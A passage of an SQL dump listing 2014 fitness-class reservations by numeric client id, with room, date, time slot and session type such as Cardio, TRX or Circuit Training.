(2124, 14, 'CTR', '2014-07-15', '17h30', '18h00', 'Cardio'),
(2125, 53, 'CTR', '2014-07-17', '18h15', '18h45', 'Renforcement musculaire'),
(2126, 54, 'CTR', '2014-07-17', '18h15', '18h45', 'Renforcement musculaire'),
(2127, 121, 'CTR', '2014-07-14', '19h00', '19h30', 'Renforcement Musculaire'),
(2129, 73, 'CTR', '2014-07-15', '19h45', '20h15', 'Renforcement Musculaire'),
(2138, 108, 'CTR', '2014-08-04', '18h15', '18h45', 'Circuit Training'),
(2185, 30, 'CTR', '2014-07-28', '18h15', '18h45', 'Circuit Training'),
(2178, 48, 'CTR', '2014-07-28', '19h00', '19h30', 'Renforcement Musculaire'),
(2134, 108, 'CTR', '2014-07-28', '18h15', '18h45', 'Circuit Training'),
(2136, 108, 'CTR', '2014-07-22', '19h00', '19h30', 'Circuit Training'),
(2222, 134, 'CTR', '2014-08-07', '19h00', '19h30', 'Cardio'),
(2140, 21, 'CTR', '2014-07-17', '17h30', '18h00', 'Circuit Training'),
(2141, 20, 'CTR', '2014-07-17', '17h30', '18h00', 'Circuit Training'),
(2179, 133, 'CTR', '2014-07-28', '19h00', '19h30', 'Renforcement Musculaire'),
(2144, 48, 'CTR', '2014-07-22', '19h45', '20h15', 'Renforcement Musculaire'),
(2145, 40, 'CTR', '2014-07-17', '17h30', '18h00', 'Circuit Training'),
(2146, 41, 'CTR', '2014-07-17', '17h30', '18h00', 'Circuit Training'),
(2148, 93, 'CTR', '2014-07-17', '19h00', '19h30', 'Cardio'),
(2150, 107, 'CTR', '2014-07-17', '19h00', '19h30', 'Cardio'),
(2151, 14, 'CTR', '2014-07-17', '17h30', '18h00', 'Circuit Training'),
(2152, 93, 'CTR', '2014-07-22', '19h00', '19h30', 'Circuit Training'),
(2153, 56, 'CTR', '2014-07-22', '18h15', '18h45', 'TRX'),
(2154, 50, 'CTR', '2014-07-22', '18h15', '18h45', 'TRX'),
(2155, 21, 'CTR', '2014-07-22', '17h30', '18h00', 'Cardio'),
(2156, 20, 'CTR', '2014-07-22', '17h30', '18h00', 'Cardio'),
(2169, 29, 'CTR', '2014-07-24', '17h30', '18h00', 'Circuit Training'),
(2158, 93, 'CTR', '2014-07-24', '19h00', '19h30', 'Cardio'),
(2213, 134, 'CTR', '2014-08-04', '18h15', '18h45', 'Circuit Training'),
(2160, 43, 'CTR', '2014-07-22', '17h30', '18h00', 'Cardio'),
(2161, 40, 'CTR', '2014-07-22', '17h30', '18h00', 'Cardio'),
(2162, 41, 'CTR', '2014-07-22', '17h30', '18h00', 'Cardio'),
(2163, 32, 'CTR', '2014-07-22', '17h30', '18h00', 'Cardio'),
(2166, 132, 'CTR', '2014-07-24', '18h15', '18h45', 'Renforcement musculaire'),
(2167, 41, 'CTR', '2014-07-24', '17h30', '18h00', 'Circuit Training'),
(2172, 31, 'CTR', '2014-07-28', '19h00', '19h30', 'Renforcement Musculaire'),
(2173, 34, 'CTR', '2014-07-24', '17h30', '18h00', 'Circuit Training'),
(2174, 133, 'CTR', '2014-07-24', '19h00', '19h30', 'Cardio'),
(2175, 32, 'CTR', '2014-07-24', '18h15', '18h45', 'Renforcement musculaire'),
(2176, 93, 'CTR', '2014-07-28', '19h00', '19h30', 'Renforcement Musculaire'),
(2180, 19, 'CTR', '2014-07-28', '19h00', '19h30', 'Renforcement Musculaire'),
(2181, 19, 'CTR', '2014-07-29', '17h30', '18h00', 'Cardio'),
(2208, 32, 'CTR', '2014-07-31', '19h00', '19h30', 'Cardio'),
(2192, 13, 'CTR', '2014-07-29', '17h30', '18h00', 'Cardio'),
(2205, 13, 'CTR', '2014-07-31', '17h30', '18h00', 'Circuit Training'),
(2186, 80, 'CTR', '2014-07-29', '18h15', '18h45', 'TRX'),
(2187, 32, 'CTR', '2014-07-28', '18h15', '18h45', 'Circuit Training'),
(2188, 53, 'CTR', '2014-07-28', '18h15', '18h45', 'Circuit Training'),
(2189, 80, 'CTR', '2014-07-28', '18h15', '18h45', 'Circuit Training'),
(2190, 14, 'CTR', '2014-07-28', '18h15', '18h45', 'Circuit Training'),
(2207, 48, 'CTR', '2014-07-31', '19h00', '19h30', 'Cardio'),
(2202, 132, 'CTR', '2014-07-31', '19h00', '19h30', 'Cardio'),
(2196, 29, 'CTR', '2014-07-29', '17h30', '18h00', 'Cardio'),
(2197, 44, 'CTR', '2014-07-29', '18h15', '18h45', 'TRX'),
(2198, 43, 'CTR', '2014-07-29', '17h30', '18h00', 'Cardio'),
(2199, 14, 'CTR', '2014-07-29', '18h15', '18h45', 'TRX'),
(2200, 93, 'CTR', '2014-07-31', '19h00', '19h30', 'Cardio'),
(2201, 133, 'CTR', '2014-07-31', '19h00', '19h30', 'Cardio'),
(2203, 29, 'CTR', '2014-07-31', '17h30', '18h00', 'Circuit Training'),
(2209, 134, 'CTR', '2014-07-31', '17h30', '18h00', 'Circuit Training'),
(2206, 100, 'CTR', '2014-07-31', '19h00', '19h30', 'Cardio'),
(2210, 92, 'CTR', '2014-07-31', '19h00', '19h30', 'Cardio'),
(2211, 102, 'CTR', '2014-07-31', '19h00', '19h30', 'Cardio'),
(2212, 80, 'CTR', '2014-08-04', '18h15', '18h45', 'Circuit Training'),
(2214, 32, 'CTR', '2014-08-04', '19h00', '19h30', 'Renforcement Musculaire'),
(2215, 96, 'CTR', '2014-08-05', '17h30', '18h00', 'Cardio'),
(2216, 93, 'CTR', '2014-08-04', '19h00', '19h30', 'Renforcement Musculaire'),
(2217, 80, 'CTR', '2014-08-04', '19h00', '19h30', 'Renforcement Musculaire'),
(2218, 80, 'CTR', '2014-08-04', '19h00', '19h30', 'Renforcement Musculaire'),
(2219, 80, 'CTR', '2014-08-04', '19h00', '19h30', 'Renforcement Musculaire'),
(2220, 132, 'CTR', '2014-08-04', '19h00', '19h30', 'Renforcement Musculaire'),
(2221, 56, 'CTR', '2014-08-04', '18h15', '18h45', 'Circuit Training'),
(2223, 132, 'CTR', '2014-08-05', '19h00', '19h30', 'Circuit Training'),
(2224, 65, 'CTR', '2014-08-05', '17h30', '18h00', 'Cardio'),
(2225, 29, 'CTR', '2014-08-05', '17h30', '18h00', 'Cardio'),
(2226, 28, 'CTR', '2014-08-07', '17h30', '18h00', 'Circuit Training'),
(2228, 51, 'CTR', '2014-08-07', '17h30', '18h00', 'Circuit Training'),
(2229, 29, 'CTR', '2014-08-07', '17h30', '18h00', 'Circuit Training'),
(2238, 44, 'CTR', '2014-08-07', '18h15', '18h45', 'Renforcement musculaire'),
(2231, 93, 'CTR', '2014-08-05', '19h00', '19h30', 'Circuit Training'),
(2232, 133, 'CTR', '2014-08-05', '19h00', '19h30', 'Circuit Training'),
(2233, 32, 'CTR', '2014-08-05', '17h30', '18h00', 'Cardio'),
(2241, 132, 'CTR', '2014-08-07', '19h00', '19h30', 'Cardio'),
(2235, 43, 'CTR', '2014-08-05', '17h30', '18h00', 'Cardio'),
(2236, 48, 'CTR', '2014-08-05', '19h00', '19h30', 'Circuit Training'),
(2237, 56, 'CTR', '2014-08-05', '17h30', '18h00', 'Cardio'),
(2239, 19, 'CTR', '2014-08-07', '17h30', '18h00', 'Circuit Training'),
(2240, 19, 'CTR', '2014-08-07', '18h15', '18h45', 'Renforcement musculaire'),
(2242, 65, 'CTR', '2014-08-07', '17h30', '18h00', 'Circuit Training'),
(2243, 93, 'CTR', '2014-08-07', '19h00', '19h30', 'Cardio'),
(2244, 133, 'CTR', '2014-08-07', '19h00', '19h30', 'Cardio'),
(2245, 105, 'CTR', '2014-08-07', '18h15', '18h45', 'Renforcement musculaire'),
(2246, 92, 'CTR', '2014-08-07', '19h00', '19h30', 'Cardio'),
(2247, 32, 'CTR', '2014-08-07', '18h15', '18h45', 'Renforcement musculaire'),
(2250, 134, 'CTR', '2014-08-11', '17h30', '18h00', 'TRX'),
(2262, 100, 'CTR', '2014-08-12', '19h00', '19h30', 'Circuit Training'),
(2261, 44, 'CTR', '2014-08-11', '18h15', '18h45', 'Circuit Training'),
(2269, 43, 'CTR', '2014-08-12', '17h30', '18h00', 'Cardio'),
(2254, 132, 'CTR', '2014-08-11', '19h00', '19h30', 'Renforcement Musculaire'),
(2255, 28, 'CTR', '2014-08-11', '17h30', '18h00', 'TRX'),
(2256, 51, 'CTR', '2014-08-11', '17h30', '18h00', 'TRX'),
(2257, 80, 'CTR', '2014-08-11', '18h15', '18h45', 'Circuit Training'),
(2258, 29, 'CTR', '2014-08-12', '17h30', '18h00', 'Cardio'),
(2259, 89, 'CTR', '2014-08-12', '19h00', '19h30', 'Circuit Training'),
(2260, 32, 'CTR', '2014-08-11', '18h15', '18h45', 'Circuit Training'),
(2263, 93, 'CTR', '2014-08-12', '19h00', '19h30', 'Circuit Training'),
(2264, 133, 'CTR', '2014-08-12', '19h00', '19h30', 'Circuit Training'),
(2265, 48, 'CTR', '2014-08-12', '19h00', '19h30', 'Circuit Training'),
(2266, 44, 'CTR', '2014-08-14', '18h15', '18h45', 'Renforcement musculaire'),
(2267, 96, 'CTR', '2014-08-12', '17h30', '18h00', 'Cardio'),
(2268, 32, 'CTR', '2014-08-12', '18h15', '18h45', 'TRX'),
(2270, 80, 'CTR', '2014-08-19', '17h30', '18h00', 'Cardio'),
(2287, 50, 'CTR', '2014-08-21', '18h15', '18h45', 'Renforcement musculaire'),
(2272, 30, 'CTR', '2014-08-12', '19h00', '19h30', 'Circuit Training'),
(2276, 30, 'CTR', '2014-08-14', '18h15', '18h45', 'Renforcement musculaire'),
(2275, 132, 'CTR', '2014-08-14', '18h15', '18h45', 'Renforcement musculaire'),
(2277, 32, 'CTR', '2014-08-14', '17h30', '18h00', 'Circuit Training'),
(2289, 30, 'CTR', '2014-08-19', '18h15', '18h45', 'TRX'),
(2279, 65, 'CTR', '2014-08-19', '17h30', '18h00', 'Cardio'),
(2281, 31, 'CTR', '2014-08-18', '19h00', '19h30', 'Renforcement Musculaire'),
(2282, 44, 'CTR', '2014-08-18', '18h15', '18h45', 'Circuit Training'),
(2283, 38, 'CTR', '2014-08-18', '19h00', '19h30', 'Renforcement Musculaire'),
(2284, 37, 'CTR', '2014-08-18', '19h00', '19h30', 'Renforcement Musculaire'),
(2285, 32, 'CTR', '2014-08-18', '18h15', '18h45', 'Circuit Training'),
(2288, 50, 'CTR', '2014-08-19', '17h30', '18h00', 'Cardio'),
(2290, 27, 'CTR', '2014-08-19', '17h30', '18h00', 'Cardio'),
(2294, 38, 'CTR', '2014-08-19', '19h00', '19h30', 'Circuit Training'),
(2292, 32, 'CTR', '2014-08-19', '18h15', '18h45', 'TRX'),
(2293, 97, 'CTR', '2014-08-19', '17h30', '18h00', 'Cardio'),
(2295, 37, 'CTR', '2014-08-19', '19h00', '19h30', 'Circuit Training'),
(2296, 134, 'CTR', '2014-08-21', '18h15', '18h45', 'Renforcement musculaire'),
(2297, 108, 'CTR', '2014-08-25', '18h15', '18h45', 'Circuit Training'),
(2298, 108, 'CTR', '2014-08-26', '19h45', '20h15', 'Renforcement Musculaire'),
(2299, 132, 'CTR', '2014-08-21', '18h15', '18h45', 'Renforcement musculaire');
INSERT INTO `reservation_reservation_bck` (`id`, `id_client`, `id_salle`, `date`, `heure_deb`, `heure_fin`, `type_seance`) VALUES
(2300, 65, 'CTR', '2014-08-26', '19h45', '20h15', 'Renforcement Musculaire'),
(2301, 43, 'CTR', '2014-08-21', '18h15', '18h45', 'Renforcement musculaire'),
(2302, 19, 'CTR', '2014-08-21', '17h30', '18h00', 'Circuit Training'),
(2303, 92, 'CTR', '2014-08-21', '17h30', '18h00', 'Circuit Training'),
(2304, 32, 'CTR', '2014-08-21', '19h00', '19h30', 'Cardio'),
(2305, 33, 'CTR', '2014-08-27', '17h30', '18h', 'Circuit training'),
(2306, 30, 'CTR', '2014-08-26', '19h45', '20h15', 'Renforcement Musculaire'),
(2307, 134, 'CTR', '2014-08-25', '18h15', '18h45', 'Circuit Training'),
(2308, 44, 'CTR', '2014-08-25', '18h15', '18h45', 'Circuit Training'),
(2310, 94, 'CTR', '2014-08-25', '19h00', '19h30', 'Renforcement Musculaire'),
(2311, 80, 'CTR', '2014-08-25', '19h00', '19h30', 'Renforcement Musculaire'),
(2312, 128, 'CTR', '2014-08-25', '18h15', '18h45', 'Circuit Training'),
(2313, 19, 'CTR', '2014-08-25', '19h00', '19h30', 'Renforcement Musculaire'),
(2356, 100, 'CTR', '2014-09-03', '19h ', '19h30', 'Circuit training'),
(2354, 31, 'CTR', '2014-09-01', '19h00', '19h30', 'Circuit training'),
(2335, 65, 'CTR', '2014-08-27', '17h30', '18h', 'Circuit training'),
(2346, 97, 'CTR', '2014-09-02', '17h30', '18h00', 'Cardio'),
(2347, 21, 'CTR', '2014-09-01', '19h00', '19h30', 'Circuit training'),
(2321, 40, 'CTR', '2014-08-26', '19h00', '19h30', 'Circuit Training'),
(2322, 41, 'CTR', '2014-08-26', '19h00', '19h30', 'Circuit Training'),
(2345, 135, 'CTR', '2014-09-01', '19h00', '19h30', 'Circuit training'),
(2324, 48, 'CTR', '2014-08-26', '19h45', '20h15', 'Renforcement Musculaire'),
(2325, 134, 'CTR', '2014-08-26', '19h00', '19h30', 'Circuit Training'),
(2326, 37, 'CTR', '2014-08-26', '19h00', '19h30', 'Circuit Training'),
(2327, 38, 'CTR', '2014-08-26', '19h00', '19h30', 'Circuit Training'),
(2328, 80, 'CTR', '2014-08-26', '19h00', '19h30', 'Circuit Training'),
(2344, 94, 'CTR', '2014-09-01', '19h00', '19h30', 'Circuit training'),
(2338, 49, 'CTR', '2014-08-27', '17h30', '18h', 'Circuit training'),
(2372, 133, 'CTR', '2014-09-01', '17h30', '18h00', 'Circuit training'),
(2350, 19, 'CTR', '2014-09-01', '19h00', '19h30', 'Circuit training'),
(2348, 20, 'CTR', '2014-09-01', '19h00', '19h30', 'Circuit training'),
(2336, 14, 'CTR', '2014-08-27', '17h30', '18h', 'Circuit training'),
(2353, 14, 'CTR', '2014-09-01', '17h30', '18h00', 'Circuit training'),
(2351, 19, 'CTR', '2014-09-04', '17h30', '18h00', 'Core'),
(2352, 48, 'CTR', '2014-09-01', '19h00', '19h30', 'Circuit training'),
(2398, 89, 'CTR', '2014-09-08', '19h00', '19h30', 'Circuit training'),
(2360, 134, 'CTR', '2014-09-02', '17h30', '18h00', 'Cardio'),
(2361, 134, 'CTR', '2014-09-01', '17h30', '18h00', 'Circuit training'),
(2362, 41, 'CTR', '2014-09-02', '19h00', '19h30', 'TRX'),
(2363, 41, 'CTR', '2014-09-04', '19h00', '19h30', 'TRX/Cardio'),
(2364, 41, 'CTR', '2014-09-03', '19h ', '19h30', 'Circuit training'),
(2366, 42, 'CTR', '2014-09-02', '19h00', '19h30', 'TRX'),
(2367, 42, 'CTR', '2014-09-03', '19h ', '19h30', 'Circuit training'),
(2368, 42, 'CTR', '2014-09-04', '19h00', '19h30', 'TRX/Cardio'),
(2369, 40, 'CTR', '2014-09-02', '19h00', '19h30', 'TRX'),
(2370, 40, 'CTR', '2014-09-03', '18h15', '18h45', 'Force'),
(2371, 40, 'CTR', '2014-09-04', '17h30', '18h00', 'Core'),
(2373, 93, 'CTR', '2014-09-01', '17h30', '18h00', 'Circuit training'),
(2374, 93, 'CTR', '2014-09-08', '19h00', '19h30', 'Circuit training'),
(2379, 93, 'CTR', '2014-09-04', '18h15', '18h45', 'Circuit training'),
(2376, 133, 'CTR', '2014-09-08', '19h00', '19h30', 'Circuit training'),
(2380, 133, 'CTR', '2014-09-04', '18h15', '18h45', 'Circuit training'),
(2378, 34, 'CTR', '2014-09-03', '17h30', '18h', 'Circuit training'),
(2381, 97, 'CTR', '2014-09-09', '17h30', '18h00', 'Cardio'),
(2382, 97, 'CTR', '2014-09-16', '17h30', '18h00', 'Cardio'),
(2383, 21, 'CTR', '2014-09-04', '17h30', '18h00', 'Core'),
(2404, 14, 'CTR', '2014-09-04', '17h30', '18h00', 'Core'),
(2385, 50, 'CTR', '2014-09-02', '19h00', '19h30', 'TRX'),
(2386, 33, 'CTR', '2014-09-03', '17h30', '18h', 'Circuit training'),
(2387, 135, 'CTR', '2014-09-08', '19h00', '19h30', 'Circuit training'),
(2388, 94, 'CTR', '2014-09-08', '19h00', '19h30', 'Circuit training'),
(2389, 37, 'CTR', '2014-09-03', '19h ', '19h30', 'Circuit training'),
(2407, 102, 'CTR', '2014-09-04', '18h15', '18h45', 'Circuit training'),
(2406, 138, 'CTR', '2014-09-04', '18h15', '18h45', 'Circuit training'),
(2392, 49, 'CTR', '2014-09-03', '18h15', '18h45', 'Force'),
(2393, 137, 'CTR', '2014-09-03', '18h15', '18h45', 'Force'),
(2394, 48, 'CTR', '2014-09-02', '19h45', '20h15', 'Circuit training'),
(2395, 31, 'CTR', '2014-09-02', '19h45', '20h15', 'Circuit training'),
(2396, 100, 'CTR', '2014-09-02', '19h45', '20h15', 'Circuit training'),
(2397, 32, 'CTR', '2014-09-02', '17h30', '18h00', 'Cardio'),
(2399, 19, 'CTR', '2014-09-03', '17h30', '18h', 'Circuit training'),
(2402, 90, 'CTR', '2014-09-03', '18h15', '18h45', 'Force'),
(2401, 65, 'CTR', '2014-09-04', '17h30', '18h00', 'Core'),
(2403, 105, 'CTR', '2014-09-04', '17h30', '18h00', 'Core'),
(2405, 50, 'CTR', '2014-09-04', '18h15', '18h45', 'Circuit training'),
(2408, 27, 'CTR', '2014-09-04', '18h15', '18h45', 'Circuit training'),
(2409, 80, 'CTR', '2014-09-04', '18h15', '18h45', 'Circuit training'),
(2410, 30, 'CTR', '2014-09-04', '19h00', '19h30', 'TRX/Cardio'),
(2411, 136, 'CTR', '2014-09-08', '17h30', '18h00', 'Circuit training'),
(2412, 31, 'CTR', '2014-09-09', '19h45', '20h15', 'Circuit training'),
(2413, 13, 'CTR', '2014-09-08', '17h30', '18h00', 'Circuit training'),
(2414, 41, 'CTR', '2014-09-09', '19h00', '19h30', 'TRX'),
(2415, 41, 'CTR', '2014-09-10', '19h ', '19h30', 'Circuit training'),
(2522, 48, 'CTR', '2014-09-24', '19h ', '19h30', 'Circuit training'),
(2417, 41, 'CTR', '2014-09-16', '19h00', '19h30', 'TRX'),
(2418, 41, 'CTR', '2014-09-17', '19h ', '19h30', 'Circuit training'),
(2498, 19, 'CTR', '2014-09-18', '17h30', '18h00', 'Core'),
(2519, 41, 'CTR', '2014-09-24', '19h ', '19h30', 'Circuit training'),
(2533, 93, 'CTR', '2014-09-25', '18h15', '18h45', 'Circuit training'),
(2423, 48, 'CTR', '2014-09-09', '19h45', '20h15', 'Circuit training'),
(2424, 48, 'CTR', '2014-09-08', '19h00', '19h30', 'Circuit training'),
(2427, 20, 'CTR', '2014-09-08', '19h00', '19h30', 'Circuit training'),
(2426, 21, 'CTR', '2014-09-08', '19h00', '19h30', 'Circuit training'),
(2428, 34, 'CTR', '2014-09-10', '17h30', '18h', 'Circuit training'),
(2429, 65, 'CTR', '2014-09-11', '17h30', '18h00', 'Core'),
(2430, 100, 'CTR', '2014-09-09', '19h45', '20h15', 'Circuit training'),
(2431, 33, 'CTR', '2014-09-10', '17h30', '18h', 'Circuit training'),
(2432, 50, 'CTR', '2014-09-09', '19h00', '19h30', 'TRX'),
(2433, 134, 'CTR', '2014-09-09', '17h30', '18h00', 'Cardio'),
(2434, 40, 'CTR', '2014-09-09', '19h00', '19h30', 'TRX'),
(2435, 40, 'CTR', '2014-09-10', '18h15', '18h45', 'Force'),
(2461, 48, 'CTR', '2014-09-15', '19h00', '19h30', 'Circuit training'),
(2437, 29, 'CTR', '2014-09-09', '17h30', '18h00', 'Cardio'),
(2470, 40, 'CTR', '2014-09-16', '19h00', '19h30', 'TRX'),
(2439, 138, 'CTR', '2014-09-09', '18h15', '18h45', 'Circuit training'),
(2471, 40, 'CTR', '2014-09-17', '18h15', '18h45', 'Force'),
(2441, 137, 'CTR', '2014-09-10', '18h15', '18h45', 'Force'),
(2442, 49, 'CTR', '2014-09-10', '18h15', '18h45', 'Force'),
(2443, 139, 'CTR', '2014-09-10', '17h30', '18h', 'Circuit training'),
(2444, 14, 'CTR', '2014-09-09', '18h15', '18h45', 'Circuit training'),
(2445, 30, 'CTR', '2014-09-09', '19h00', '19h30', 'TRX'),
(2554, 32, 'CTR', '2014-09-29', '19h00', '19h30', 'Circuit training'),
(2447, 31, 'CTR', '2014-09-16', '19h45', '20h15', 'Circuit training'),
(2448, 134, 'CTR', '2014-09-11', '17h30', '18h00', 'Core'),
(2449, 93, 'CTR', '2014-09-15', '19h00', '19h30', 'Circuit training'),
(2450, 133, 'CTR', '2014-09-15', '19h00', '19h30', 'Circuit training'),
(2451, 63, 'CTR', '2014-09-10', '17h30', '18h', 'Circuit training'),
(2456, 105, 'CTR', '2014-09-11', '17h30', '18h00', 'Core'),
(2567, 19, 'CTR', '2014-10-02', '17h30', '18h00', 'Core'),
(2458, 136, 'CTR', '2014-09-15', '17h30', '18h00', 'Circuit training'),
(2459, 136, 'CTR', '2014-09-17', '19h ', '19h30', 'Circuit training'),
(2462, 56, 'CTR', '2014-09-15', '17h30', '18h00', 'Circuit training'),
(2463, 48, 'CTR', '2014-09-16', '19h45', '20h15', 'Circuit training'),
(2464, 134, 'CTR', '2014-09-15', '17h30', '18h00', 'Circuit training'),
(2465, 134, 'CTR', '2014-09-16', '19h00', '19h30', 'TRX'),
(2466, 28, 'CTR', '2014-09-22', '17h30', '18h00', 'Circuit training'),
(2467, 28, 'CTR', '2014-09-24', '17h30', '18h', 'Circuit training'),
(2468, 44, 'CTR', '2014-09-15', '17h30', '18h00', 'Circuit training'),
(2469, 13, 'CTR', '2014-09-15', '17h30', '18h00', 'Circuit training'),
(2472, 40, 'CTR', '2014-09-23', '19h00', '19h30', 'TRX'),
(2474, 40, 'CTR', '2014-09-24', '18h15', '18h45', 'Force'),
(2475, 40, 'CTR', '2014-09-25', '17h30', '18h00', 'Core'),
(2476, 34, 'CTR', '2014-09-17', '17h30', '18h', 'Circuit training'),
(2477, 30, 'CTR', '2014-09-16', '19h45', '20h15', 'Circuit training'),
(2510, 19, 'CTR', '2014-09-25', '17h30', '18h00', 'Core'),
(2479, 49, 'CTR', '2014-09-17', '18h15', '18h45', 'Force'),
(2480, 137, 'CTR', '2014-09-17', '18h15', '18h45', 'Force'),
(2481, 90, 'CTR', '2014-09-17', '18h15', '18h45', 'Force'),
(2482, 93, 'CTR', '2014-09-18', '18h15', '18h45', 'Circuit training'),
(2483, 93, 'CTR', '2014-09-29', '19h00', '19h30', 'Circuit training'),
(2484, 93, 'CTR', '2014-09-22', '19h00', '19h30', 'Circuit training'),
(2509, 94, 'CTR', '2014-09-22', '19h00', '19h30', 'Circuit training'),
(2549, 136, 'CTR', '2014-09-29', '17h30', '18h00', 'Circuit training'),
(2487, 21, 'CTR', '2014-09-18', '17h30', '18h00', 'Core'),
(2488, 20, 'CTR', '2014-09-18', '17h30', '18h00', 'Core'),
(2489, 31, 'CTR', '2014-09-23', '19h45', '20h15', 'Circuit training'),
(2490, 48, 'CTR', '2014-09-17', '19h ', '19h30', 'Circuit training'),
(2491, 57, 'CTR', '2014-09-17', '19h ', '19h30', 'Circuit training'),
(2492, 30, 'CTR', '2014-09-17', '19h ', '19h30', 'Circuit training'),
(2493, 139, 'CTR', '2014-09-17', '17h30', '18h', 'Circuit training'),
(2494, 63, 'CTR', '2014-09-17', '17h30', '18h', 'Circuit training'),
(2495, 44, 'CTR', '2014-09-18', '17h30', '18h00', 'Core'),
(2496, 44, 'CTR', '2014-09-22', '17h30', '18h00', 'Circuit training'),
(2501, 134, 'CTR', '2014-09-22', '17h30', '18h00', 'Circuit training'),
(2499, 19, 'CTR', '2014-09-22', '19h00', '19h30', 'Circuit training'),
(2502, 134, 'CTR', '2014-09-23', '19h00', '19h30', 'TRX'),
(2503, 134, 'CTR', '2014-09-24', '18h15', '18h45', 'Force'),
(2504, 134, 'CTR', '2014-09-25', '17h30', '18h00', 'Core'),
(2505, 48, 'CTR', '2014-09-22', '19h00', '19h30', 'Circuit training'),
(2506, 89, 'CTR', '2014-09-22', '19h00', '19h30', 'Circuit training'),
(2507, 136, 'CTR', '2014-09-22', '17h30', '18h00', 'Circuit training'),
(2508, 140, 'CTR', '2014-09-24', '17h30', '18h', 'Circuit training'),
(2511, 19, 'CTR', '2014-09-25', '18h15', '18h45', 'Circuit training'),
(2521, 136, 'CTR', '2014-09-24', '17h30', '18h', 'Circuit training'),
(2513, 141, 'CTR', '2014-09-24', '17h30', '18h', 'Circuit training'),
(2514, 48, 'CTR', '2014-09-23', '19h45', '20h15', 'Circuit training'),
(2515, 14, 'CTR', '2014-09-23', '18h15', '18h45', 'Circuit training'),
(2516, 14, 'CTR', '2014-09-23', '19h00', '19h30', 'TRX'),
(2517, 142, 'CTR', '2014-09-25', '18h15', '18h45', 'Circuit training'),
(2518, 143, 'CTR', '2014-09-25', '18h15', '18h45', 'Circuit training'),
(2520, 13, 'CTR', '2014-09-24', '17h30', '18h', 'Circuit training'),
(2542, 31, 'CTR', '2014-09-30', '19h45', '20h15', 'Circuit training'),
(2524, 126, 'CTR', '2014-09-24', '17h30', '18h', 'Circuit training'),
(2525, 34, 'CTR', '2014-09-24', '17h30', '18h', 'Circuit training'),
(2526, 38, 'CTR', '2014-09-24', '19h ', '19h30', 'Circuit training'),
(2527, 37, 'CTR', '2014-09-24', '19h ', '19h30', 'Circuit training'),
(2528, 49, 'CTR', '2014-09-24', '18h15', '18h45', 'Force'),
(2529, 63, 'CTR', '2014-09-24', '17h30', '18h', 'Circuit training'),
(2530, 140, 'CTR', '2014-09-29', '17h30', '18h00', 'Circuit training'),
(2532, 63, 'CTR', '2014-09-25', '17h30', '18h00', 'Core'),
(2546, 14, 'CTR', '2014-09-29', '17h30', '18h00', 'Circuit training'),
(2535, 21, 'CTR', '2014-09-25', '17h30', '18h00', 'Core'),
(2536, 20, 'CTR', '2014-09-25', '17h30', '18h00', 'Core'),
(2537, 65, 'CTR', '2014-09-25', '17h30', '18h00', 'Core'),
(2538, 38, 'CTR', '2014-09-25', '19h00', '19h30', 'TRX/Cardio'),
(2539, 105, 'CTR', '2014-09-25', '17h30', '18h00', 'Core'),
(2541, 32, 'CTR', '2014-09-25', '19h00', '19h30', 'TRX/Cardio'),
(2543, 41, 'CTR', '2014-10-14', '19h00', '19h30', 'TRX'),
(2544, 41, 'CTR', '2014-10-15', '19h ', '19h30', 'Circuit training'),
(2545, 41, 'CTR', '2014-10-16', '19h00', '19h30', 'TRX/Cardio'),
(2547, 14, 'CTR', '2014-10-02', '18h15', '18h45', 'Circuit training'),
(2548, 14, 'CTR', '2014-10-02', '19h00', '19h30', 'TRX/Cardio'),
(2550, 48, 'CTR', '2014-09-29', '19h00', '19h30', 'Circuit training'),
(2551, 57, 'CTR', '2014-09-29', '19h00', '19h30', 'Circuit training'),
(2552, 27, 'CTR', '2014-09-29', '17h30', '18h00', 'Circuit training'),
(2553, 94, 'CTR', '2014-09-29', '19h00', '19h30', 'Circuit training'),
(2555, 48, 'CTR', '2014-09-30', '19h45', '20h15', 'Circuit training'),
(2563, 44, 'CTR', '2014-10-02', '17h30', '18h00', 'Core'),
(2557, 40, 'CTR', '2014-10-02', '17h30', '18h00', 'Core'),
(2558, 30, 'CTR', '2014-09-30', '19h45', '20h15', 'Circuit training'),
(2559, 13, 'CTR', '2014-10-01', '17h30', '18h', 'Circuit training'),
(2560, 138, 'CTR', '2014-09-30', '19h45', '20h15', 'Circuit training'),
(2561, 40, 'CTR', '2014-09-30', '19h45', '20h15', 'Circuit training'),
(2562, 77, 'CTR', '2014-09-30', '19h45', '20h15', 'Circuit training'),
(2564, 34, 'CTR', '2014-10-01', '17h30', '18h', 'Circuit training'),
(2565, 105, 'CTR', '2014-10-02', '17h30', '18h00', 'Core'),
(2566, 93, 'CTR', '2014-10-02', '18h15', '18h45', 'Circuit training'),
(2569, 29, 'CTR', '2014-10-02', '18h15', '18h45', 'Circuit training'),
(2570, 80, 'CTR', '2014-10-02', '18h15', '18h45', 'Circuit training'),
(2571, 143, 'CTR', '2014-10-02', '18h15', '18h45', 'Circuit training'),
(2572, 93, 'CTR', '2014-10-06', '19h00', '19h30', 'Circuit training'),
(2573, 31, 'CTR', '2014-10-07', '19h45', '20h15', 'Circuit training'),
(2574, 94, 'CTR', '2014-10-06', '19h00', '19h30', 'Circuit training'),
(2613, 47, 'CTR', '2014-10-10', '17h30', '18h00', 'TRX'),
(2576, 13, 'CTR', '2014-10-06', '17h30', '18h00', 'Circuit training'),
(2577, 14, 'CTR', '2014-10-06', '17h30', '18h00', 'Circuit training'),
(2597, 140, 'CTR', '2014-10-07', '18h15', '18h45', 'Circuit training'),
(2579, 140, 'CTR', '2014-10-13', '17h30', '18h00', 'Circuit training'),
(2580, 44, 'CTR', '2014-10-06', '17h30', '18h00', 'Circuit training'),
(2581, 44, 'CTR', '2014-10-09', '17h30', '18h00', 'Core'),
(2582, 48, 'CTR', '2014-10-06', '19h00', '19h30', 'Circuit training'),
(2583, 143, 'CTR', '2014-10-06', '19h00', '19h30', 'Circuit training'),
(2584, 65, 'CTR', '2014-10-06', '17h30', '18h00', 'Circuit training'),
(2585, 32, 'CTR', '2014-10-06', '19h00', '19h30', 'Circuit training'),
(2586, 48, 'CTR', '2014-10-07', '19h45', '20h15', 'Circuit training'),
(2587, 138, 'CTR', '2014-10-07', '19h45', '20h15', 'Circuit training'),
(2611, 31, 'CTR', '2014-10-14', '19h45', '20h15', 'Circuit training'),
(2612, 19, 'CTR', '2014-10-09', '17h30', '18h00', 'Core'),
(2590, 16, 'CTR', '2014-10-08', '17h30', '18h', 'Circuit training'),
(2610, 48, 'CTR', '2014-10-10', '18h15', '18h45', 'Circuit training'),
